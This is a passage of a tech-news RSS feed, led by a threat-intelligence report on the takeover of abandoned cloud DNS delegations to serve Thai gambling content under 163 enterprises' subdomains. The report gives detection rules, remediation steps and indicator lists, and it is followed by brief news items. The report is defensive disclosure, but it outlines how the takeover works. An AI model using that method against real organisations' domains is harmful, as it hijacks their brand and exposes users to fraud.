<p><!-- wp:image {"id":120469,"sizeSlug":"large","linkDestination":"none","align":"center"} --></p>
<figure class="wp-block-image aligncenter size-large"><img src="https://cyble.com/wp-content/uploads/2026/06/login-page-1024x562.png" alt="Figure 6 : Phishing page Redirected to hxxps://link99.nova555.rest/register/ with link99 as a referral code" class="wp-image-120469"><figcaption class="wp-element-caption">Figure 6 : Phishing page Redirected to hxxps://link99.nova555.rest/register/ with link99 as a referral code</figcaption></figure>
<p><!-- /wp:image --></p>
<p><!-- wp:paragraph --></p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p>Four destination platforms have been confirmed — ibiza99.autos, big888.store, seven77.click, and stillsunday.pl. These domains are white-label deployments on a shared codebase, as confirmed by identical CSS hashes and JavaScript resilience logic across all three, except big888.store, which carries active Google Search Console verification, indicating the platform operator runs its own independent SEO operation beyond this campaign. Each platform maintains its own <strong>appbox.* CDN subdomains</strong>, a fourth infrastructure layer entirely separate from the delivery nodes, backend fleet, and victim domains.</p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:image {"id":120470,"sizeSlug":"large","linkDestination":"none","align":"center"} --></p>
<figure class="wp-block-image aligncenter size-large"><img src="https://cyble.com/wp-content/uploads/2026/06/details-1024x565.png" alt="Figure 7: Asking for banking information post login via Thailand phone number
" class="wp-image-120470"><figcaption class="wp-element-caption">Figure 7: Asking for banking information post login via Thailand phone number<br></figcaption></figure>
<p><!-- /wp:image --></p>
<p><!-- wp:paragraph --></p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:heading {"level":3} --></p>
<h3 class="wp-block-heading">The Gambling Kit: What the Endpoint Delivers</h3>
<p><!-- /wp:heading --></p>
<p><!-- wp:paragraph --></p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p>An HTTP request to any compromised enterprise subdomain with Thai locale headers returns a fully rendered Next.js page that returns a legitimate enterprise web property. The page presents</p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:list --></p>
<ul class="wp-block-list"><!-- wp:list-item -->
<li>lang="th" with Thai-language gambling platform branding</li>
<p><!-- /wp:list-item --></p>
<p><!-- wp:list-item --></p>
<li>A valid Let's Encrypt wildcard TLS certificate matching the victim subdomain, clean browser padlock, no warnings</li>
<p><!-- /wp:list-item --></p>
<p><!-- wp:list-item --></p>
<li>Schema.org FAQ structured data with Thai-language answers about minimum deposits, withdrawal timelines, and mobile compatibility, directly targeting the queries Thai users make when researching gambling platforms</li>
<p><!-- /wp:list-item --></p>
<p><!-- wp:list-item --></p>
<li>AMP alternate links for Google mobile indexing coverage</li>
<p><!-- /wp:list-item --></p>
<p><!-- wp:list-item --></p>
<li>Static assets served from paths under the compromised domain itself, using the victim's domain authority as a CDN</li>
<p><!-- /wp:list-item --></p></ul>
<p><!-- /wp:list --></p>
<p><!-- wp:paragraph --></p>
<p>The minimum deposit advertised across all kit variants is 1 Thai Baht, approximately $0.03 USD. The 1-baht minimum ($0.03 USD) removes the deposit threshold that causes most users to abandon the registration flow before converting. The kit fingerprint is consistent across the entire victim estate, regardless of which victim domain or OVH node serves the content, confirming centralized build and deployment by a single operator.</p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:image {"id":120472,"sizeSlug":"large","linkDestination":"none","align":"center"} --></p>
<figure class="wp-block-image aligncenter size-large"><img src="https://cyble.com/wp-content/uploads/2026/06/How-to-earn-874x1024.png" alt="Figure 8 - Three-tier referral commission structure (10%/3%/1%) plus 0.3% turnover rebate, embedded in the gambling kit served across all 163 compromised subdomains" class="wp-image-120472"><figcaption class="wp-element-caption">Figure 8 - Three-tier referral commission structure (10%/3%/1%) plus 0.3% turnover rebate, embedded in the gambling kit served across all 163 compromised subdomains</figcaption></figure>
<p><!-- /wp:image --></p>
<p><!-- wp:paragraph --></p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:image {"id":120473,"sizeSlug":"large","linkDestination":"none","align":"center"} --></p>
<figure class="wp-block-image aligncenter size-large"><img src="https://cyble.com/wp-content/uploads/2026/06/Earn_attraction-1024x909.png" alt="Figure 9: Multi-level recruitment diagram promoting unlimited monthly commissions across three affiliate downline tiers." class="wp-image-120473"><figcaption class="wp-element-caption">Figure 9: Multi-level recruitment diagram promoting unlimited monthly commissions across three affiliate downline tiers.</figcaption></figure>
<p><!-- /wp:image --></p>
<p><!-- wp:paragraph --></p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:heading {"level":3} --></p>
<h3 class="wp-block-heading">Backend Infrastructure: The Hong Kong Fleet</h3>
<p><!-- /wp:heading --></p>
<p><!-- wp:paragraph --></p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p>The three OVH delivery nodes handle content distribution, but the application layer sits entirely within a separate dedicated infrastructure in Hong Kong. The 103-node backend fleet is distributed across seven /24 subnets within 38.173.0.0/16, all under AS398478 (PEG TECH INC). Seven independent evidence points converge on single-operator control; the MD5 match across all 103 nodes on port 80 alone eliminates coincidence.</p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:table --></p>
<figure class="wp-block-table">
<table class="has-fixed-layout">
<tbody>
<tr>
<td><strong>Evidence Point</strong><strong></strong></td>
<td><strong>Detail</strong><strong></strong></td>
<td><strong>Weight</strong><strong></strong></td>
</tr>
<tr>
<td>HTTP body MD5 match</td>
<td>7df3d7cf3358af3f470ac7229387ef94 (615 bytes) identical across all 103 nodes on port 80</td>
<td>Critical</td>
</tr>
<tr>
<td>Single shared certificate</td>
<td>broker-xm.com Let's Encrypt cert deployed across all 103 servers</td>
<td>High</td>
</tr>
<tr>
<td>Envoy proxy fingerprint</td>
<td>Identical 503 error string on port 443 across all 103 nodes</td>
<td>High</td>
</tr>
<tr>
<td>MySQL version</td>
<td>5.7.44-log with binary replication logging enabled uniformly</td>
<td>High</td>
</tr>
<tr>
<td>BT-Panel provisioning</td>
<td>admin@bt.cn, Dongguan, Guangdong, on FTP certificates across all nodes</td>
<td>High</td>
</tr>
<tr>
<td>JARM fingerprint</td>
<td>07d14d16d21d21d07c42d43d000000270a013a3e21e28897e76e8fe13e2f7d uniform across fleet</td>
<td>High</td>
</tr>
<tr>
<td>Zero PTR records</td>
<td>No reverse DNS on any of the 103 IPs, deliberate suppression</td>
<td>Medium</td>
</tr>
</tbody>
</table>
</figure>
<p><!-- /wp:table --></p>
<p><!-- wp:paragraph --></p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:heading {"level":3} --></p>
<h3 class="wp-block-heading">Detection and Hunting</h3>
<p><!-- /wp:heading --></p>
<p><!-- wp:paragraph --></p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p>The campaign produces no signal in standard security controls. Valid TLS certificates, clean IP reputation, trusted domain names, and no exploit delivery mean conventional tooling produces no signal. Detection requires operating at the DNS layer.</p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p><strong>Certificate Transparency monitoring</strong> is the most reliable early indicator. An unexpected Let's Encrypt wildcard certificate on a corporate-owned subdomain, particularly following a period of no issuance, is an anomaly no legitimate provisioning scenario produces. Monitoring CT logs for wildcard certificates whose expected issuer is a corporate or premium CA would have detected every Azure takeover victim at the time of certificate issuance.</p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p><strong>Azure DNS zone delegation</strong> <strong>auditing</strong> is a structural prevention control. Organizations should enumerate all NS delegation records in their parent DNS zones and verify that corresponding Azure DNS zones exist in subscriptions they own and actively manage. 163 organizations across 30 countries had gambling content served under their domain authority without any alert firing. One class of DNS misconfiguration enabled it.</p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p><strong>Wildcard DNS testing</strong> confirms active exploitation. A randomized nonsense hostname query against any Azure-delegated subdomain that returns a resolution should be treated as a compromised zone until proven otherwise.</p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p><strong>Network and endpoint detection rules:</strong></p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:list --></p>
<ul class="wp-block-list"><!-- wp:list-item -->
<li>DNS answers resolving to 51.79.199.51, 139.99.82.106, or 38.127.8.49</li>
<p><!-- /wp:list-item --></p>
<p><!-- wp:list-item --></p>
<li>URL query parameters containing rc=ibiza99vip1, rc=bigwinv1, or rc=seven77vip1 or rc=link99</li>
<p><!-- /wp:list-item --></p>
<p><!-- wp:list-item --></p>
<li>HTTP requests to /img/ib99-hq.ico</li>
<p><!-- /wp:list-item --></p>
<p><!-- wp:list-item --></p>
<li>Outbound connections to 38.173.30.0/24, 38.173.37.0/24, 38.173.56.0/24, 38.173.57.0/24, 38.173.235.0/24, 38.173.236.0/24, or 38.173.239.0/24</li>
<p><!-- /wp:list-item --></p></ul>
<p><!-- /wp:list --></p>
<p><!-- wp:paragraph --></p>
<p><strong>Internet scanning queries:</strong></p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:list --></p>
<ul class="wp-block-list"><!-- wp:list-item -->
<li>HTTP body MD5: 7df3d7cf3358af3f470ac7229387ef94</li>
<p><!-- /wp:list-item --></p>
<p><!-- wp:list-item --></p>
<li>TLS certificate CN: broker-xm.com</li>
<p><!-- /wp:list-item --></p>
<p><!-- wp:list-item --></p>
<li>ASN sweep: AS398478</li>
<p><!-- /wp:list-item --></p></ul>
<p><!-- /wp:list --></p>
<p><!-- wp:paragraph --></p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:heading --></p>
<h2 class="wp-block-heading">Remediation</h2>
<p><!-- /wp:heading --></p>
<p><!-- wp:paragraph --></p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p><strong>For Azure DNS zone takeover victims:</strong></p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:list {"ordered":true} --></p>
<ol class="wp-block-list"><!-- wp:list-item -->
<li>Remove the NS delegation from your parent DNS zone immediately. This severs the attack chain regardless of what the actor maintains inside the Azure zone, which is under their control and cannot be directly modified by the victim organization.</li>
<p><!-- /wp:list-item --></p>
<p><!-- wp:list-item --></p>
<li>Report the abandoned zone to Microsoft MSRC at msrc@microsoft.com with the zone name and evidence. Microsoft can force-remove zones from subscriptions holding abandoned delegations.</li>
<p><!-- /wp:list-item --></p>
<p><!-- wp:list-item --></p>
<li>Request revocation of any Let's Encrypt certificates issued against the compromised subdomain using the certificate serial numbers from crt.sh.</li>
<p><!-- /wp:list-item --></p>
<p><!-- wp:list-item --></p>
<li>Audit all remaining subdomains for additional environment-style entries (dev, uat, staging, preprod, pilot, lab, test, sandbox) carrying NS delegations to cloud providers, and verify each delegation is intentional, current, and managed.
</li>
<p><!-- /wp:list-item --></p></ol>
<p><!-- /wp:list --></p>
<p><!-- wp:paragraph --></p>
<p><strong>For DigitalOcean zone takeover victims</strong>: Remove the NS delegation from the parent zone and verify whether the DigitalOcean zone exists in an account you own.</p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p><strong>For direct wildcard misconfiguration victims:</strong> Remove the wildcard A record from your DNS management console. If the origin of the record cannot be identified, treat the DNS management credential as compromised and rotate it immediately.</p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:heading --></p>
<h2 class="wp-block-heading"><strong>Conclusion</strong></h2>
<p><!-- /wp:heading --></p>
<p><!-- wp:paragraph --></p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p>This campaign demonstrates that enterprise reputational trust can be systematically harvested through a single class of DNS misconfiguration that most organizations have no visibility into. The actor did not breach any perimeter or exploit any application vulnerability. They claimed what had been left unclaimed and built a commercial affiliate operation on top of it.</p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p>The scale, 163 organizations across 30+ countries, is not the result of 163 separate attacks. It is an automated scanning process applied to a single vulnerability class. A single wildcard record beneath an abandoned Azure delegation exposes an unlimited subdomain namespace, each entry inheriting the full TLS-verified authority of the victim's brand. The campaign lives entirely within legitimate infrastructure, OVH delivery nodes, Let's Encrypt certificates, victim-owned domains, and organic search rankings, which is precisely why conventional controls produce no signal.</p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p>Audit your DNS estate. Every abandoned NS delegation pointing to a cloud provider is a candidate for the next version of this list. Every abandoned NS delegation pointing to a cloud provider is a potential entry in the next version of this list. The remediation is simple. The detection methodology is documented here. The gap between a decommissioned project and an actively exploited subdomain closed silently on 163 organizations. In several cases, it stayed closed for over six years.</p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:heading --></p>
<h2 class="wp-block-heading"><strong>MITRE ATT&amp;CK® Techniques</strong></h2>
<p><!-- /wp:heading --></p>
<p><!-- wp:paragraph --></p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:table --></p>
<figure class="wp-block-table">
<table class="has-fixed-layout">
<tbody>
<tr>
<td><strong>Technique</strong><strong></strong></td>
<td><strong>ID</strong><strong></strong></td>
<td><strong>Description</strong><strong></strong></td>
</tr>
<tr>
<td>Resource Development — Acquire Infrastructure</td>
<td>T1583.003</td>
<td>OVH VPS for delivery; PEG TECH INC ASN for backend fleet</td>
</tr>
<tr>
<td>Resource Development — Compromise Infrastructure</td>
<td>T1584</td>
<td>Azure DNS zone takeover of legitimate enterprise subdomains</td>
</tr>
<tr>
<td>Initial Access — Drive-by Compromise</td>
<td>T1189</td>
<td>Thai users directed to compromised enterprise subdomains via organic search</td>
</tr>
<tr>
<td>Persistence — Valid Accounts</td>
<td>T1078</td>
<td>DNS management credentials implied by per-subdomain record creation (Verizon)</td>
</tr>
<tr>
<td>Defense Evasion — Impersonation</td>
<td>T1656</td>
<td>Gambling kit served under legitimate enterprise TLS certificates</td>
</tr>
<tr>
<td>Defense Evasion — Valid Accounts: Cloud Accounts</td>
<td>T1078.004</td>
<td>Azure account used to claim abandoned DNS zones</td>
</tr>
<tr>
<td>Collection — Adversary-in-the-Middle</td>
<td>T1557</td>
<td>Server-side affiliate referrer verification intercepts the user session</td>
</tr>
<tr>
<td>Exfiltration — Web Service</td>
<td>T1567</td>
<td>User registration data and financial transactions were exfiltrated to gambling platforms</td>
</tr>
</tbody>
</table>
</figure>
<p><!-- /wp:table --></p>
<p><!-- wp:paragraph --></p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:heading --></p>
<h2 class="wp-block-heading"><strong>Indicators of Compromise (IOCs)</strong></h2>
<p><!-- /wp:heading --></p>
<p><!-- wp:paragraph --></p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:table --></p>
<figure class="wp-block-table">
<table class="has-fixed-layout">
<tbody>
<tr>
<td colspan="3"><strong>Delivery Infrastructure</strong></td>
</tr>
<tr>
<td><strong>Indicator</strong></td>
<td><strong>Type</strong></td>
<td><strong>Description</strong></td>
</tr>
<tr>
<td>51.79.199.51</td>
<td>IP</td>
<td>Primary OVH delivery node, AS16276</td>
</tr>
<tr>
<td>139.99.82.106</td>
<td>IP</td>
<td>Secondary OVH delivery node, AS16276</td>
</tr>
<tr>
<td>38.127.8.49</td>
<td>IP</td>
<td>Tertiary OVH delivery node, AS16276</td>
</tr>
<tr>
<td>38.173.30.0/24</td>
<td>CIDR</td>
<td>Backend fleet, AS398478 PEG TECH INC</td>
</tr>
<tr>
<td>38.173.37.0/24</td>
<td>CIDR</td>
<td>Backend fleet, AS398478 PEG TECH INC</td>
</tr>
<tr>
<td>38.173.56.0/24</td>
<td>CIDR</td>
<td>Backend fleet, AS398478 PEG TECH INC</td>
</tr>
<tr>
<td>38.173.57.0/24</td>
<td>CIDR</td>
<td>Backend fleet, AS398478 PEG TECH INC</td>
</tr>
<tr>
<td>38.173.235.0/24</td>
<td>CIDR</td>
<td>Backend fleet, AS398478 PEG TECH INC</td>
</tr>
<tr>
<td>38.173.236.0/24</td>
<td>CIDR</td>
<td>Backend fleet, AS398478 PEG TECH INC</td>
</tr>
<tr>
<td>38.173.239.0/24</td>
<td>CIDR</td>
<td>Backend fleet, AS398478 PEG TECH INC</td>
</tr>
<tr>
<td colspan="3"><strong>Certificates and Fingerprints</strong></td>
</tr>
<tr>
<td><strong>Indicator</strong></td>
<td><strong>Type</strong></td>
<td><strong>Description</strong></td>
</tr>
<tr>
<td>d9799ca2f08af6992dc80c49f9889fef40ed27c7</td>
<td>SHA1</td>
<td>bt.default.com custom CA on primary delivery node</td>
</tr>
<tr>
<td>broker-xm.com</td>
<td>Domain</td>
<td>Let's Encrypt cert across all 103 backend nodes</td>
</tr>
<tr>
<td>07d14d16d21d21d07c42d43d000000270a013a3e21e28897e76e8fe13e2f7d</td>
<td>JARM</td>
<td>TLS fingerprint across delivery and backend infrastructure</td>
</tr>
<tr>
<td>7df3d7cf3358af3f470ac7229387ef94</td>
<td>MD5</td>
<td>HTTP body hash, 615 bytes, port 80, all 103 backend nodes</td>
</tr>
<tr>
<td colspan="3"><strong>Campaign Kit Fingerprints</strong></td>
</tr>
<tr>
<td><strong>Indicator</strong></td>
<td><strong>Type</strong></td>
<td><strong>Description</strong></td>
</tr>
<tr>
<td>QQOrXCFjoI6C9oF-4YVhl</td>
<td>String</td>
<td>Next.js build ID across all delivery endpoints</td>
</tr>
<tr>
<td>/img/ib99-hq.ico</td>
<td>URI</td>
<td>Kit-specific favicon path</td>
</tr>
<tr>
<td>main.af42a497.css</td>
<td>Hash</td>
<td>Shared CSS fingerprint across all three destination platforms</td>
</tr>
<tr>
<td>pub-a4952b46ff9c4f6b8d5529cd21f9a1e3.r2.dev</td>
<td>Domain</td>
<td>Cloudflare R2 CDN bucket</td>
</tr>
<tr>
<td colspan="3"><strong>Affiliate Domains and Tracking</strong></td>
</tr>
<tr>
<td><strong>Indicator</strong></td>
<td><strong>Type</strong></td>
<td><strong>Description</strong></td>
</tr>
<tr>
<td>ibiza99.autos</td>
<td>Domain</td>
<td>Destination platform, affiliate code ibiza99vip1</td>
</tr>
<tr>
<td>big888.store</td>
<td>Domain</td>
<td>Destination platform, affiliate code bigwinv1</td>
</tr>
<tr>
<td>seven77.click</td>
<td>Domain</td>
<td>Destination platform, affiliate code seven77vip1</td>
</tr>
<tr>
<td>link99.nova555.rest</td>
<td>Domain</td>
<td>Destination platform, affiliate code link99</td>
</tr>
<tr>
<td>appbox.7y6texmeyy.com</td>
<td>Domain</td>
<td>ibiza99.autos image CDN</td>
</tr>
<tr>
<td>appbox.devh5api27.xyz</td>
<td>Domain</td>
<td>big888.store image CDN</td>
</tr>
<tr>
<td>appbox.55u4g5g4k2.com</td>
<td>Domain</td>
<td>seven77.click image CDN</td>
</tr>
<tr>
<td>322242757545449</td>
<td>Pixel ID</td>
<td>Facebook Pixel, ibiza99.autos</td>
</tr>
<tr>
<td>1607473696511298</td>
<td>Pixel ID</td>
<td>Facebook Pixel, ibiza99.autos</td>
</tr>
<tr>
<td>721331896825411</td>
<td>Pixel ID</td>
<td>Facebook Pixel, big888.store</td>
</tr>
<tr>
<td>GTM-NP59MP3T</td>
<td>GTM ID</td>
<td>Google Tag Manager, big888.store</td>
</tr>
<tr>
<td colspan="3"><strong>Parallel Operations (AS398478)</strong></td>
</tr>
<tr>
<td><strong>Indicator</strong></td>
<td><strong>Type</strong></td>
<td><strong>Description</strong></td>
</tr>
<tr>
<td>99997778.com</td>
<td>Domain</td>
<td>Active Chinese gambling platform, AS398478</td>
</tr>
<tr>
<td>bevictor.com</td>
<td>Domain</td>
<td>Chinese offshore sports betting (伟德国际), AS398478</td>
</tr>
</tbody>
</table>
</figure>
<p><!-- /wp:table --></p>
<p>The post <a rel="nofollow" href="https://cyble.com/blog/borrowed-trust-cloud-dns-takeover-thai-gambling-seo-poisoning/">Borrowed Trust – Systematic Exploitation of Abandoned Cloud DNS Delegations to serve Thai Gambling SEO Content</a> appeared first on <a rel="nofollow" href="https://cyble.com/">Cyble</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Some Spotify users are convinced the platform is creating AI artist profiles and bios, and I think these conspiracy theories are getting out of hand — and there are other music fans who agree]]></title>
<description><![CDATA[Spotify is facing more scrutiny over AI slop, but the accusations are getting out of hand.]]></description>
<link>https://tsecurity.de/de/3588274/it-nachrichten/some-spotify-users-are-convinced-the-platform-is-creating-ai-artist-profiles-and-bios-and-i-think-these-conspiracy-theories-are-getting-out-of-hand-and-there-are-other-music-fans-who-agree/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3588274/it-nachrichten/some-spotify-users-are-convinced-the-platform-is-creating-ai-artist-profiles-and-bios-and-i-think-these-conspiracy-theories-are-getting-out-of-hand-and-there-are-other-music-fans-who-agree/</guid>
<pubDate>Wed, 10 Jun 2026 18:18:49 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Spotify is facing more scrutiny over AI slop, but the accusations are getting out of hand.]]></content:encoded>
</item>
<item>
<title><![CDATA[Microsoft AI chief backtracks on job loss fears — while Satya Nadella pushes for AI agents to be treated like employees]]></title>
<description><![CDATA[Microsoft AI CEO Mustafa Suleyman's statement about AI's impact on white-collar jobs was misconstrued. He said the technology will automate mundane tasks, not wipe out the jobs entirely.]]></description>
<link>https://tsecurity.de/de/3587124/windows-tipps/microsoft-ai-chief-backtracks-on-job-loss-fears-while-satya-nadella-pushes-for-ai-agents-to-be-treated-like-employees/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3587124/windows-tipps/microsoft-ai-chief-backtracks-on-job-loss-fears-while-satya-nadella-pushes-for-ai-agents-to-be-treated-like-employees/</guid>
<pubDate>Wed, 10 Jun 2026 11:23:12 +0200</pubDate>
<category>🪟 Windows Tipps</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Microsoft AI CEO Mustafa Suleyman's statement about AI's impact on white-collar jobs was misconstrued. He said the technology will automate mundane tasks, not wipe out the jobs entirely.]]></content:encoded>
</item>
<item>
<title><![CDATA[Microsoft breaks Patch Tuesday record with 206 vulnerabilities]]></title>
<description><![CDATA[Fears and warnings about a roaring flood of error-riddled software have materialized. And the disease is spreading.
The post Microsoft breaks Patch Tuesday record with 206 vulnerabilities appeared first on CyberScoop.]]></description>
<link>https://tsecurity.de/de/3585903/it-security-nachrichten/microsoft-breaks-patch-tuesday-record-with-206-vulnerabilities/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3585903/it-security-nachrichten/microsoft-breaks-patch-tuesday-record-with-206-vulnerabilities/</guid>
<pubDate>Tue, 09 Jun 2026 22:07:58 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Fears and warnings about a roaring flood of error-riddled software have materialized. And the disease is spreading.</p>
<p>The post <a href="https://cyberscoop.com/microsoft-patch-tuesday-june-2026/">Microsoft breaks Patch Tuesday record with 206 vulnerabilities</a> appeared first on <a href="https://cyberscoop.com/">CyberScoop</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Anthropic brings Mythos to the masses with Claude Fable 5, its most powerful generally available model ever]]></title>
<description><![CDATA[Anthropic today launched two new AI models — Claude Fable 5 and Claude Mythos 5 — marking the company’s first broad release of the powerful “Mythos-class” AI capabilities it previously made available only to participating organizations in its restricted cybersecurity program, Project Glasswing, w...]]></description>
<link>https://tsecurity.de/de/3585604/it-nachrichten/anthropic-brings-mythos-to-the-masses-with-claude-fable-5-its-most-powerful-generally-available-model-ever/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3585604/it-nachrichten/anthropic-brings-mythos-to-the-masses-with-claude-fable-5-its-most-powerful-generally-available-model-ever/</guid>
<pubDate>Tue, 09 Jun 2026 20:32:55 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Anthropic today <a href="https://www.anthropic.com/news/claude-fable-5-mythos-5">launched two new AI models </a>— Claude Fable 5 and Claude Mythos 5 — marking the company’s first broad release of the powerful “Mythos-class” AI capabilities it previously made available only to participating organizations in its restricted cybersecurity program, <a href="https://venturebeat.com/technology/anthropic-says-its-most-powerful-ai-cyber-model-is-too-dangerous-to-release">Project Glasswing</a>, which it announced two months ago.</p><p>The company says Fable 5, which is the version most users and developers will get starting today, exceeds every Claude model it has previously made generally available — featuring stronger performance across software engineering, knowledge work, vision, scientific research and long-running tasks. </p><p>It smashes the existing benchmarks and comes atop on nearly all of them, though the prior Claude Mythos Preview version of the model still takes the top spots on computer use and multidisciplinary reasoning (see benchmark chart below and <a href="https://www.anthropic.com/news/claude-fable-5-mythos-5">here</a>). </p><p>The new Claude Mythos 5, by contrast, is a more restricted, upgraded version of the prior, similarly restricted Mythos Preview model. As such, it has certain safeguards lifted for approved users, including Anthropic's cybersecurity partners in its Project Glasswing effort, and select biology researchers. </p><p>The key difference is that the general purpose Fable 5 wraps the same underlying Mythos-class capability in new safeguards. Anthropic says requests involving certain high-risk areas — including cybersecurity, biology and chemistry, and model distillation — are automatically routed to <a href="https://venturebeat.com/technology/anthropics-claude-opus-4-8-is-here-with-3x-cheaper-fast-mode-and-near-mythos-level-alignment">Claude Opus 4.8,</a> Anthropic's previously flagship general model, instead, with users notified when that happens. </p><p>The company says more than 95% of Fable sessions run entirely on Fable’s own responses, with no fallback, and that internal and external red-teaming efforts found no “universal jailbreaks” after more than 1,000 hours of testing.</p><p>Anthropic says Fable 5 is available to the general public today through its website, apps, and <a href="https://platform.claude.com/docs/en/about-claude/models/overview">API</a>, but that Mythos 5 will initially only be made available to users who already have access to the older Claude Mythos Preview.</p><h2><b>Pricing, access and a tricky rollout</b></h2><p>Anthropic is pricing both Fable 5 and Mythos 5 at $10 per million input tokens and $50 per million output tokens. The company says that is less than half the price of Claude Mythos Preview, but still ranks as the most expensive of major AI models available globally. </p><h1><b>VentureBeat Frontier AI Model API Pricing Snapshot</b></h1><table><tbody><tr><td><p><b>Model</b></p></td><td><p><b>Input</b></p></td><td><p><b>Output</b></p></td><td><p><b>Total Cost</b></p></td><td><p><b>Source</b></p></td></tr><tr><td><p>MiMo-V2.5 Flash</p></td><td><p>$0.10</p></td><td><p>$0.30</p></td><td><p>$0.40</p></td><td><p><a href="https://platform.xiaomimimo.com/docs/en-US/pricing">Xiaomi MiMo</a></p></td></tr><tr><td><p>deepseek-v4-flash</p></td><td><p>$0.14</p></td><td><p>$0.28</p></td><td><p>$0.42</p></td><td><p><a href="https://api-docs.deepseek.com/quick_start/pricing">DeepSeek</a></p></td></tr><tr><td><p>deepseek-v4-pro</p></td><td><p>$0.435</p></td><td><p>$0.87</p></td><td><p>$1.305</p></td><td><p><a href="https://api-docs.deepseek.com/quick_start/pricing">DeepSeek</a></p></td></tr><tr><td><p>MiniMax-M3</p></td><td><p>$0.30</p></td><td><p>$1.20</p></td><td><p>$1.50</p></td><td><p><a href="https://platform.minimax.io/subscribe/token-plan?tab=api-enterprise">MiniMax</a></p></td></tr><tr><td><p>Gemini 3.1 Flash-Lite</p></td><td><p>$0.25</p></td><td><p>$1.50</p></td><td><p>$1.75</p></td><td><p><a href="https://ai.google.dev/gemini-api/docs/pricing">Google</a></p></td></tr><tr><td><p>Qwen3.7-Plus</p></td><td><p>$0.40</p></td><td><p>$1.60</p></td><td><p>$2.00</p></td><td><p><a href="https://modelstudio.console.alibabacloud.com/ap-southeast-1?tab=doc#/doc/?type=model&amp;url=2840914_2&amp;modelId=qwen3.7-plus&amp;serviceSite=international">Alibaba Cloud</a></p></td></tr><tr><td><p>MiMo-V2.5</p></td><td><p>$0.40</p></td><td><p>$2.00</p></td><td><p>$2.40</p></td><td><p><a href="https://platform.xiaomimimo.com/docs/en-US/pricing">Xiaomi MiMo</a></p></td></tr><tr><td><p>Grok 4.3 (low context)</p></td><td><p>$1.25</p></td><td><p>$2.50</p></td><td><p>$3.75</p></td><td><p><a href="https://docs.x.ai/developers/models/grok-4.3">xAI</a></p></td></tr><tr><td><p>GLM-5</p></td><td><p>$1.00</p></td><td><p>$3.20</p></td><td><p>$4.20</p></td><td><p><a href="https://docs.z.ai/guides/overview/pricing">Z.ai</a></p></td></tr><tr><td><p>Kimi-K2.6</p></td><td><p>$0.95</p></td><td><p>$4.00</p></td><td><p>$4.95</p></td><td><p><a href="https://platform.kimi.ai/docs/pricing/chat-k26">Moonshot/Kimi</a></p></td></tr><tr><td><p>GLM-5.1</p></td><td><p>$1.40</p></td><td><p>$4.40</p></td><td><p>$5.80</p></td><td><p><a href="https://docs.z.ai/guides/overview/pricing">Z.ai</a></p></td></tr><tr><td><p>Grok 4.3 (high context)</p></td><td><p>$2.50</p></td><td><p>$5.00</p></td><td><p>$7.50</p></td><td><p><a href="https://docs.x.ai/developers/models/grok-4.3">xAI</a></p></td></tr><tr><td><p>Qwen3.7-Max</p></td><td><p>$2.50</p></td><td><p>$7.50</p></td><td><p>$10.00</p></td><td><p><a href="https://modelstudio.console.alibabacloud.com/ap-southeast-1?spm=a2ty_o05.31384571.0.0.52649f6b7G0D55&amp;tab=doc#/doc/?type=model&amp;url=2840914_2&amp;modelId=qwen3.7-max&amp;serviceSite=international">Alibaba Cloud</a></p></td></tr><tr><td><p>Gemini 3.5 Flash</p></td><td><p>$1.50</p></td><td><p>$9.00</p></td><td><p>$10.50</p></td><td><p><a href="https://ai.google.dev/gemini-api/docs/pricing">Google</a></p></td></tr><tr><td><p>Gemini 3.1 Pro Preview (≤200K)</p></td><td><p>$2.00</p></td><td><p>$12.00</p></td><td><p>$14.00</p></td><td><p><a 